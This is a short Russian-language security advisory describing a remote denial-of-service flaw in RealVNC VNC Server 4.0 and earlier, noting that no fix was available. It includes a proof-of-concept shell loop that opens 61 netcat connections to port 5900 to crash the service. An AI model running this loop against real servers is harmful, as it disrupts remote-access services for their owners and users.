Security Lab

Удаленный отказ в обслуживании в RealVNC VNC Server

Дата публикации:29.08.2004
Дата изменения:21.10.2008
Всего просмотров:1439
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: RealVNC 4.x
Уязвимые версии: RealVNC VNC Server 4.0 и более ранние версии

Описание: Уязвимость обнаружена в RealVNC VNC Server. Удаленный пользователь может аварийно завершить работу целевой службы.

Удаленный пользователь может установить более 60 подключений у целевой VNC службе, чтобы аварийно завершить работу программы. Пример:

for i in `seq 1 61`
do
nc <server_ip> 5900
done

URL производителя:http://www.realvnc.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: RealVNC 4.0 DoS